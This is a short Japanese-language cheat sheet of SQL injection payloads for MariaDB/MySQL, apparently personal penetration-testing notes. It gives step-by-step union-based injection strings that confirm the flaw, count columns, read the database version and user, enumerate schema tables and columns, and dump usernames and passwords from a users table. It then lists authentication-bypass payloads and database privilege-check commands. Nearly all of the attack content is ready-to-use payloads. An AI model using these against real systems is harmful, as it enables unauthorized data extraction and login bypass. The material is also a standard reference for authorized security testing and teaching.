# SQLinjection

* 脆弱性の確認

```
'or 1=1;#
'
```

※システムエラー画面に遷移したら脆弱性と判断して問題ない

* 1行のみ表示

```
'or 1=1 LIMIT 1;#
```

* カラム数の確認

```
'or 1=1 order by 1;#
```

カラム数を1から徐々に増やしていくことでテーブルに何カラムあるかがわかる。

カラム数を超えるとSQLがエラーとなる

※Burpsuiteのrepeaterを利用して効率的に確認が可能

* どのカラムが何番目のカラムかの確認

```
'or 1=1 union all select 1, 2, 3;#
```

* MariaDBのデータベースバージョンの確認

```
'or 1=1 union all select 1, 2, @@version;#
```

* 現在のユーザの確認

```
'or 1=1 union all select 1, 2, user();#
```

* スキーマテーブルの確認

```
'or 1=1 union all select 1, 2, table_name from information_schema.tables;#
```

* 対象のテーブルのカラムの確認

```
'or 1=1 union all select 1, 2, column_name from information_schema.columns where table_name='users';#
```

* 情報の列挙

```
'or 1=1 union all select 1, username, password from users;#
```



#### SQL実行できるかの確認

SQLの構造を推定しながら複数文字ためしていく(DBに合わせてMSSQL Injection PWNageなどの検索で見つける)

https://www.exploit-db.com/papers/12975

↑ほかにもSQLに関するたくさんのことが書いてありかなり有益なサイト

```
	+-----------------------------+
	|	  ' or 1=1 --	      |
	|	  a' or 1=1 --	      |
	|	  " or 1=1 --	      |
	|	  a" or 1=1 --	      |
	|	  ' or 1=1 #	      |
	|	  " or 1=1 #	      |
	|	  or 1=1 --	      |
	|	  ' or 'x'='x	      |
	|	  " or "x"="x	      |
	|	  ') or ('x'='x	      |
	|	  ") or ("x"="x	      |
	| ' or username LIKE '%admin% |
	+-----------------------------+
	|      USERNAME:  ' or 1/*    |
	|      PASSWORD:  */ =1 --    |
	+-----------------------------+
	|  USERNAME: admin' or 'a'='a |
	|  PASSWORD: '#		      |
	+-----------------------------+
```

SQLが上記のサンプルコードで刺さればAuthentication bypassをすることも可能な場合もある



### MariaDB(MySQL DB)

ログイン

```
mysql --host=127.0.0.1 --port=13306 --user=wp -p
```

権限の確認

```
SHOW Grants;
```

変数の確認

```
show variables;
```

